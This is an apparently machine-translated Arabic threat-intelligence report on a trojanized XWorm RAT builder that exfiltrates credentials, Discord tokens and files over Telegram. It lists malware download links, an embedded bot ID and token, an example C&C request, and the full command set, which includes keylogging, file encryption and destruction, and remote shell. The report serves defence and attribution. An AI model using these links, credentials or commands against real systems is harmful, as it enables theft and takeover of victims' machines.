ملخص تنفيذي

تم تسليح نسخة تروجانية من أداة إنشاء XWorm RAT ونشرها. إنها تستهدف بشكل خاص أطفال البرامج النصية الجدد في مجال الأمن السيبراني وقم بتنزيل واستخدام الأدوات المذكورة في البرامج التعليمية المختلفة مباشرةً مما يدل على عدم وجود شرف بين اللصوص. تنتشر البرامج الضارة بشكل أساسي من خلال Github repo ولكنها تستخدم أيضًا خدمات مشاركة الملفات الأخرى. لقد فعلت ذلك حتى الآن اخترق أكثر من 18,459 جهازًا عالميًا، قادر على استخراج البيانات الحساسة مثل بيانات اعتماد المتصفح ورموز Discord وبيانات Telegram ومعلومات النظام. تتميز البرامج الضارة أيضًا بوظائف متقدمة، بما في ذلك فحوصات المحاكاة الافتراضية وتعديلات التسجيل ومجموعة واسعة من الأوامر التي تتيح التحكم الكامل في الأنظمة المصابة. تشمل البلدان الأكثر ضحية روسيا والولايات المتحدة والهند وأوكرانيا وتركيا.

تستخدم البرامج الضارة تيليجرام كبنية أساسية للقيادة والتحكم (C&C)، وتستفيد من رموز الروبوت ومكالمات API لإصدار أوامر للأجهزة المصابة واستخراج البيانات المسروقة. كشف التحليل أن البرامج الضارة قد قامت حتى الآن بسرقة أكثر من 1 غيغابايت من بيانات اعتماد المتصفح من أجهزة متعددة. حدد الباحثون أيضًا ميزة «مفتاح القفل» للبرامج الضارة، والتي تم الاستفادة منها لتعطيل العمليات على الأجهزة النشطة.

استهدفت جهود التعطيل شبكة الروبوتات الخاصة بالبرامج الضارة من خلال استغلال أمر إلغاء التثبيت الخاص بها. على الرغم من فعاليتها للأجهزة النشطة، إلا أن القيود مثل الأجهزة غير المتصلة بالإنترنت وتقييد الأسعار في Telegram شكلت تحديات. ربطت جهود الإسناد العملية بفاعل تهديد باستخدام أسماء مستعارة مثل»@shinyenigma«و»@milleniumrat«بالإضافة إلى حسابات GitHub وعنوان ProtonMail..

التحليل

أدى ظهور أحصنة طروادة المتطورة للوصول عن بُعد (RATs) إلى تضخيم التهديدات السيبرانية، مع ظهور XWorm كمثال مهم. في الآونة الأخيرة، تم تحديد أداة إنشاء Trojanized XWorm RAT، ويتم نشرها من قبل الجهات الفاعلة في مجال التهديد عبر قنوات متعددة مثل مستودعات GitHub وخدمات مشاركة الملفات وقنوات Telegram والمنتديات. وقد استهدف هذا بشكل خاص أطفال البرامج النصية الجدد في مجال الأمن السيبراني ويستخدمون الأدوات المذكورة في البرامج التعليمية المختلفة.. يوفر هذا المنشئ للمهاجمين أداة مبسطة لنشر وتشغيل RAT عالي القدرة، والذي يتميز بقدرات متقدمة مثل استطلاع النظام وتسريب البيانات وتنفيذ الأوامر.

يهدف هذا التحليل إلى تقديم رؤى مفصلة حول تسليم ووظائف وتأثير أداة إنشاء Trojanized XWorm RAT هذه. من خلال الاستفادة من البيانات التي تم تسريبها عبر Telegram، اكتشفنا مصادر العدوى، ورسمنا آليات القيادة والتحكم (C&C)، وحددنا اتساع قدراتها والأجهزة المتأثرة. بالإضافة إلى ذلك، أجرينا أنشطة تعطيل تستهدف البنية التحتية للبوت نت للتخفيف من عملياتها.

ناقل التسليم

استخدمنا Telegram API لإعادة توجيه الرسائل التي تم تسريبها باستخدام الروبوت إلى حساب تحت سيطرتنا. استنادًا إلى الرسائل التي تم الحصول عليها، قمنا بإجراء OCR على الصور التي كانت في الأساس لقطات شاشة للأجهزة المصابة بالبرامج الضارة. من بين هؤلاء قمنا بتصفية عناوين URL وتمكنا من الحصول على مصادر العدوى التي كانت على النحو التالي:

خدمات مشاركة الملفات

• https://mega.nz/file/wz1C3TYT
• https://www.upload.ee/files/16734195/AsyncClientexe.html 
• https://www.upload.ee/files/17050076/binded.exe.html 

مستودعات جيت هاب

• https://github.com/LifelsHex/FastCryptor/blob/main/screen 
• https://github.com/Intestio/XWorm-RAT/releases/tag/xworm 
• https://github.com/FullPenetrationTesting/888-RAT 
• https://github.com/inheritedeu/888-RAT 
• https://github.com/guessthatname99/XWorm-RAT-V2.1 
• https://github.com/kavateforaro/PhantomCrypt 
• https://github.com/Cryakl/Ultimate-RAT-Collection/tree/main/ImminentMonitor 
• https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/ImminentMonitor 
• https://github.com/kiffGhost/Vedani-Crypter/releases/tag/Vedani-Crypter
• https://github.com/brainfucker854/XWorm-RAT-V5.6/pulls 

قنوات تيليجرام

• https://t.me/HAX_CRYPT  
• https://t.me/inheritedeu 

يوتيوب ومواقع الويب الأخرى

• https://www.youtube.com/watch?v=wYivVXDfx9w 
• https://sinister.ly/Thread-Free-cracked-RATs-and-Crypters

‍

‍

ميزات البرامج الضارة

فحوصات المحاكاة الافتراضية

تقوم البرامج الضارة بفحص المحاكاة الافتراضية على النظام من خلال قراءة مفاتيح التسجيل. المفاتيح المرتبطة بـ حافلة NDIS الافتراضية و التجسيد الافتراضي من المرجح أن تكون موجودة في البيئات الافتراضية لأنها تتعامل مع واجهات الأجهزة الافتراضية للشبكات والرسومات. وبالتالي، إذا اكتشفت البرامج الضارة أنها تعمل في بيئة افتراضية، فإنها لا تنشر العدوى أكثر.

‍

‍

تعديل التسجيل

يقوم XWorm أيضًا بتعديل إدخالات التسجيل المختلفة. عندما يكون الأمر»/machine_id *إضافة بدء التشغيل» يتم استدعاؤه من خادم C&C، وتضيف البرامج الضارة إدخالات إلى سجل Windows لضمان تنفيذها عند بدء تشغيل النظام. من خلال تعديل مفاتيح تسجيل محددة، يمكن للبرامج الضارة تشغيل حمولتها تلقائيًا في كل مرة يتم فيها تشغيل النظام، وبالتالي الحفاظ على الوصول المستمر.

‍

‍

خادم C&C

تستخدم البرامج الضارة التلغرام كخادم تحكم وأوامر. يتم ترميز الملفات التنفيذية للبرامج الضارة باستخدام معرف روبوت التلغرام ورمز الروبوت على النحو التالي:

• معرف بوت تيليجرام: بوت 8077286634
• رمز تيليجرام بوت: AAG1xHB6LEJVQLQFJBMVOJD2YSHQXNNDQ

استخراج البيانات

عند التنفيذ الأول، ترسل البرامج الضارة طلبًا إلى»http://ip-api.com/json/» للتحقق من عنوان IP وتفاصيل موقع الجهاز المخترق. بعد ذلك يجمع كل كلمات المرور المحفوظة من المتصفحات ويرسلها عبر إرسال مستند نقطة نهاية واجهة برمجة تطبيقات التلغرام.

‍

‍

ثم تقوم البرامج الضارة أيضًا بإعادة توجيه رموز الخلاف التي عثرت عليها عبر أرسل رسالة نقطة نهاية واجهة برمجة تطبيقات تيليجرام.

‍

‍

بعد ذلك، تقوم البرامج الضارة بتسلل معلومات النظام الخاصة بالضحية وإعادة توجيهها إلى واجهة برمجة تطبيقات التلغرام عبر أرسل رسالة.

‍

‍

في بعض الحالات، تلتقط البرامج الضارة أيضًا لقطات شاشة للنظام بمجرد إصابته وتسرق أيضًا بيانات التلغرام في حالة تثبيت Telegram على الجهاز. أخيرًا، يرسل الجهاز رسالة متصلة إلى دردشة التلغرام جنبًا إلى جنب مع الموقع (الذي تم الحصول عليه من ip-api.com) ومعرف الجهاز الخاص بالجهاز الذي تم اختراقه.

‍

‍

الآن بعد أن تم تسريب هذه البيانات، تظل البرامج الضارة في وضع الخمول في انتظار الأوامر الواردة من خادم C&C. وهي تستخدم احصل على التحديثات طريقة Telegram API للاستماع إلى أي أوامر واردة للجهاز المصاب. يبدو الأمر عادةً مثل /machine_id *command. إذا أرسل مهاجم أي أمر بهذا التنسيق إلى بوت التلغرام، يمكن للجهاز المصاب اختياره من هناك وتنفيذ الأوامر وفقًا لذلك.

‍

طلب

احصل على /BOT8077286634: AAG1xHB6LEJVQLQFJBVOJD2YSHQXSZNDQ/الحصول على التحديثات؟ الأوفسيت=-1 HTTP/1.1

المضيف: api.telegram.org

‍

البرامج الضارة التي تنتظر الأوامر عبر GetUpdates الخاص بواجهة برمجة تطبيقات Telegram

‍

الميزات

القائمة الشاملة للأوامر التي تطيعها الأجهزة المصابة هي كما يلي:

• /عبر الإنترنت - شاهد جميع الروبوتات الخاصة بك
• /machine_id *المساعدة - المساعدة
• /machine_id *سطح المكتب - احصل على لقطة شاشة
• /machine_id *تيليجرام - احصل على بيانات التلغرام
• /machine_id *discord - احصل على بيانات الخلاف
• /machine_id *whois - احصل على موقع المستخدم
• /machine_id *history - احصل على سجل المتصفح
• /machine_id *HistoryForce - احصل على المزيد من سجل المتصفح عن طريق قتل عمليات المتصفح، واستخدمها بعناية
• /machine_id *المتصفحات - احصل على بيانات المتصفح
• /machine_id *BrowsersForce - احصل على المزيد من بيانات المتصفح عن طريق قتل عمليات المتصفح، استخدمها بعناية
• /machine_id *getDesktop - احصل على ملفات سطح المكتب المفيدة (.pdf و.txt وما إلى ذلك)
• /machine_id *systeminfo - احصل على معلومات النظام
• /machine_id *نافذة نشطة - احصل على عنوان نافذة نشط
• /machine_id *معلومات البطارية - احصل على حالة البطارية
• /machine_id *programlist - احصل على قائمة البرامج المثبتة
• /machine_id *إلغاء التثبيت - قم بإلغاء تثبيت RAT من جهاز الكمبيوتر الخاص بالضحية
• /machine_id *message* <message>*<error/warn/exclamination/question> - اعرض مربع الرسالة للمستخدم، واترك الوسيطة الثانية فارغة لنوع صندوق الرسائل الافتراضي
• /machine_id *speak* <text>- نطق النص للمستخدم، لن يعمل إلا إذا كان النص باللغة الإنجليزية
• /machine_id *تصغير - تصغير جميع النوافذ المفتوحة
• /machine_id *mizmize - تكبير جميع النوافذ الخلفية
• /machine_id *openurl* <url>- افتح عنوان url المحدد في متصفح المستخدم الافتراضي
• /machine_id *إيقاف التشغيل - قم بإيقاف تشغيل الكمبيوتر
• /machine_id *إعادة التشغيل - أعد تشغيل الكمبيوتر
• /machine_id *الإسبات - أدخل وضع السبات
• /machine_id *تسجيل الخروج - تسجيل خروج المستخدم
• /machine_id *bsod - استدعاء شاشة الموت الزرقاء
• /machine_id *sendkeypress <keys>- ستقوم الضحية «بالضغط» على مفاتيح لوحة المفاتيح المحددة
• /machine_id<0/90/180/270> *displayrotation - اضبط زاوية دوران الشاشة، 0 - الوضع العادي
• /machine_id *encrypt* <Password>- تشفير ملفات المستخدم بكلمة مرور معينة، يجب تذكرها لفك التشفير
• /machine_id *decrypt* <Password>- فك تشفير ملفات المستخدم، سيتم تدمير جميع الملفات إذا كانت كلمة المرور خاطئة
• /machine_id *copy**<src File/Dir full> -<dist File/Dir full path> انسخ ملفًا إلى دليل، على سبيل المثال /3453 *نسخ* C:\Users\User\Downloads\1.txt * C:\Users\User\1.txt
• /machine_id *list* <Dir full path>- يعرض الملفات والمجلدات في دليل، على سبيل المثال /3453 *list* C:\Users
• <File/Dir full path>/machine_id *size* - احصل على حجم الملف/الدليل
• <File/Dir full path>/machine_id *حذف* - يحذف ملفًا أو مجلدًا
• /machine_id *run* <File full path>- يقوم بتشغيل ملف (مثل exe و png و txt وما إلى ذلك)
• /machine_id *upload*<File/Dir full path> - يلتقط ملفًا من جهاز الكمبيوتر الخاص بالضحية، ولن يعمل إذا كان الملف كبيرًا جدًا
• /machine_id *download - يقوم الكمبيوتر الشخصي للضحية بتنزيل ملف مرفق بهذه الرسالة، إذا كانت صورة، فيجب أيضًا إرفاقها كملف
• /machine_id *processlist - يعرض قائمة العمليات الحالية قيد التشغيل
• /machine_id *processkill*<process name, e.g. discord, Telegram etc> - اقتل العملية بالاسم، يجب عدم إضافة .exe
• /machine_id *processpath*<process name, e.g. discord, Telegram etc> - أظهر المسار إلى العملية، يجب عدم إضافة .exe
• /machine_id *DesktopPath - أظهر المسار إلى سطح المكتب
• /machine_id *startuplist - راجع قائمة برامج بدء التشغيل
• /machine_id *startupadd - أضف RAT إلى بدء التشغيل
• /machine_id *cmd* <command>- قم بتشغيل أمر cmd على جهاز الكمبيوتر الخاص بالضحية
• /machine_id *destroy* <Dir full path>- تدمير جميع الملفات/المجلدات الممكنة في الدليل
• /machine_id *gift* * <NEW TOKEN><NEW CHAT ID>* <message>- قم بإهداء هذا الروبوت إلى مستخدم آخر، يجب بدء تشغيل روبوت التلغرام الخاص به
• /machine_id *keylogger - احصل على سجلات مفاتيح المستخدم
• /machine_id * KeyloggerClear - مسح سجلات مفاتيح المستخدم
• /machine_id *حول - حول

‍

التأثير

باستخدام تقنية معينة، تمكنا من تفريغ البيانات بالكامل التي تم تسريبها عبر Telegram بواسطة البرامج الضارة. تظهر النتائج التي توصلنا إليها أنه حتى الآن تم اختراق البرامج الضارة أكثر من 18459 جهازًا. البلدان الخمسة الأولى المتأثرة بمنشئ RAT الثلاثي هي كما يلي:

1. روسيا
2. الولايات المتحدة الأمريكية
3. الهند
4. أوكرانيا
5. تركيا

‍

‍

ومع ذلك، من بين 18459+ جهازًا مصابًا، تمت سرقة بيانات اعتماد المتصفح من 2068 جهازًا فقط حتى الآن. البيانات التي تم تسريبها بواسطة البرامج الضارة هي كما يلي:

• ملفات 4991 .jpg: لقطة شاشة للأجهزة المخترقة باستخدام أمر /device_id *desktop.
• ملفات 2222 .zip: يتم تفريغ بيانات المتصفح افتراضيًا بعد الإصابة.
• 20 .exe: تم إسقاط الملفات التنفيذية المخصصة على الأجهزة المصابة من قبل الجهات الفاعلة المهددة على الأجهزة المصابة عبر الأمر /device_id *download. ملفات exe هذه غير موجودة في virustotal حتى الآن.
• 8. النص: ملفات كيلوجر التي تم الحصول عليها بعد تشغيل /device_id *keylogger

في إحدى الحالات، تم تنزيل كل ملف pdf و mp3 من الضحية فقط لاختبار ما إذا كان يحتوي على أي شيء حساس. وفيما يلي توزيع البيانات التي تم تسريبها من حيث الحجم:

• تم تصفية 1112.21 ميجابايت (حوالي 1 جيجابايت) من بيانات اعتماد المتصفح.
• 425.784 ميغابايت من ملفات.jpg التي تمثل لقطات شاشة للأجهزة المصابة.

تعطيل الروبوتات

كانت الأجهزة المصابة تعمل مثل الروبوتات، وتستمع إلى الأوامر عبر واجهة برمجة تطبيقات التلغرام. خلال ملاحظتنا وجدنا أن البرنامج الضار يحتوي على ميزة تعمل بمثابة «مفتاح القفل» من النوع الذي يمكن استدعاؤه من رسائل التلغرام المرسلة إلى الروبوت من قبل الجهات الفاعلة في التهديد.

مفتاح القتل

تضمنت البرامج الضارة أمرًا /إلغاء التثبيت والتي تم استخدامها من قبل جهة التهديد في الماضي لإزالة عدوى البرامج الضارة من جهاز باستخدام معرف الجهاز الخاص به.

‍

‍

لذلك، كانت هناك 3 أشياء مطلوبة لإزالة العدوى من الجهاز:

1. معرف الجهاز الذي تم تعيينه بواسطة البرامج الضارة
2. الوصول إلى روبوت التلغرام لإرسال الرسالة.
3. يجب أن يكون الجهاز المصاب متصلاً بالإنترنت ويستمع إلى الأوامر.

تم الحصول على معرفات الجهاز التي جمعناها من الدردشات واسم مستخدم روبوت التلغرام عبر احصل علي نقطة نهاية واجهة برمجة تطبيقات تيليجرام. بدمج الاثنين، قمنا بعمل مجموعتين من الرسائل إلى الروبوت:

1. جميع معرفات الجهاز موجودة في الرسائل.
2. معرفات آلة الإجبار الغاشمة من 1 إلى 9999.

‍

‍

خلال هذه المدة، سيقوم أي جهاز يستمع بنشاط إلى الرسائل وتم مطابقة معرف الجهاز الخاص به بإزالة البرامج الضارة منه تلقائيًا. تظهر لقطة الشاشة أدناه احصل على التحديثات رسالة سيراها الجهاز في وقت انفجار رسالتنا.

‍

‍

حدود النهج

• لن تكون جميع الأجهزة المصابة متصلة بالإنترنت في وقت انفجار رسائلنا. ومن ثم لن يحصلوا على أمر إلغاء التثبيت وسيظلون مصابين.
• يتم تحديد المعدل عن طريق برقية الرسائل المرسلة إلى الروبوت. ومن ثم ربما تكون بعض الرسائل قد فقدت أثناء النقل أو حتى تم حظر حساب Telegram الخاص بنا مؤقتًا لبعض الوقت.

الإسناد\ البنية التحتية

في الرسائل القليلة الأولى التي تم إلقاؤها من روبوت التلغرام، رأينا أن هناك ملف.rdp تم تحميله على جهاز مصاب من قبل الجهات الفاعلة في التهديد. يمكن القول بثقة متوسطة أنه تم استخدامه لأغراض الاختبار من قبل الجهات الفاعلة في التهديد. كان عنوان AWS في ملف RDP هو»ec2-18-191-85-60.us-east-2.compute.amazonaws.com».

‍

‍

من رسائل الالتزام على المستودعات حيث شارك ممثل التهديد أداة إنشاء RAT trojanized، حصلنا على عنوان البريد الإلكتروني التالي: [email protected]. في الماضي، استخدم نفس ممثل التهديد حسابات Github متعددة مثل:

• https://github.com/ShinyEni/Millenium-RAT
• https://github.com/Shinyenigma/XWorm-RAT 

اسم مستخدم قناة تيليجرام الذي يقدم RAT: @milleniumrat

اسم مستخدم Telegram لممثل التهديد: @shinyenigma

‍

‍

التخفيف

1. الكشف والاستجابة

• اكتشاف نقطة النهاية والاستجابة لها (EDR): قم بنشر حلول EDR المتقدمة لاكتشاف نشاط RAT والتخفيف من حدته من خلال مراقبة سلوكيات النظام غير العادية، مثل تعديلات التسجيل غير المصرح بها أو الوصول إلى بيانات المتصفح أو استخدام Telegram API.
• مراقبة الشبكة: استخدم أنظمة كشف التسلل والوقاية (IDPS) لتحديد وحظر الاتصال بخوادم C&C الضارة، بما في ذلك نقاط نهاية Telegram API.

2. الاحتواء

• أنظمة الحجر الصحي المصابة: اعزل الأجهزة المخترقة فورًا عن الشبكة لمنع المزيد من تسرب البيانات والحركة الجانبية.
• تعطيل روبوتات تيليجرام الضارة: قم بالإبلاغ وطلب تعليق روبوتات Telegram المستخدمة في عمليات C&C.

3. الذكاء والتوعية بالتهديدات

• تحديث خلاصات معلومات التهديدات: قم بتحديث خلاصات المعلومات باستمرار باستخدام IOCs (مؤشرات التسوية) من المستودعات الضارة المحددة وقنوات Telegram وخدمات مشاركة الملفات.
• تدريب الموظفين: قم بتثقيف الموظفين حول التعرف على روابط التصيد الاحتيالي والتنزيلات الضارة ومنشئي RAT المزيفين لتقليل ناقلات العدوى الأولية.

4. تدابير استباقية

• حظر IOC المعروفة:بعض النصوص
  • حظر الوصول إلى مستودعات GitHub الضارة وروابط مشاركة الملفات وقنوات Telegram في محيط الشبكة.
• أنظمة المراقبة والتصحيح: قم بتحديث البرامج بانتظام، وخاصة التطبيقات التي تواجه الإنترنت، لإغلاق نقاط الضعف التي يستغلها المهاجمون.
• فرض إدراج التطبيق في القائمة البيضاء: قم بتقييد تنفيذ البرامج غير المصرح بها، مثل Trojanized RAT builder، على أجهزة نقطة النهاية.

5. الاستئصال

• استخدم أوامر Kill Switch المعروفة: استفد من الأوامر مثل /unstall على الأجهزة المصابة التي يمكن الوصول إليها لإزالة البرامج الضارة بقوة، إن أمكن.
• إزالة التهديدات الشاملة: بعد التأكد من عدم اتصال الأنظمة، قم بإزالة مفاتيح التسجيل الضارة وتنظيف البرامج النصية لبدء التشغيل وإجراء فحص عميق للنظام لضمان القضاء على RAT.

6. الإجراءات القانونية والتعاونية

• المشاركة مع سلطات إنفاذ القانون: التعاون مع السلطات لتعقب ومحاكمة الجهات الفاعلة المعنية، والاستفادة من تفاصيل الإسناد التي تم الكشف عنها في التحقيق.
• التعاون مع مزودي المنصة: كن شريكًا مع منصات مثل GitHub و Telegram وخدمات مشاركة الملفات لإزالة المحتوى والحسابات الضارة.

مؤشرات التسوية (IOCs)

‍

المراجع

• ^#بروتوكول إشارات المرور - ويكيبيديا
• https://tria.ge/
• https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm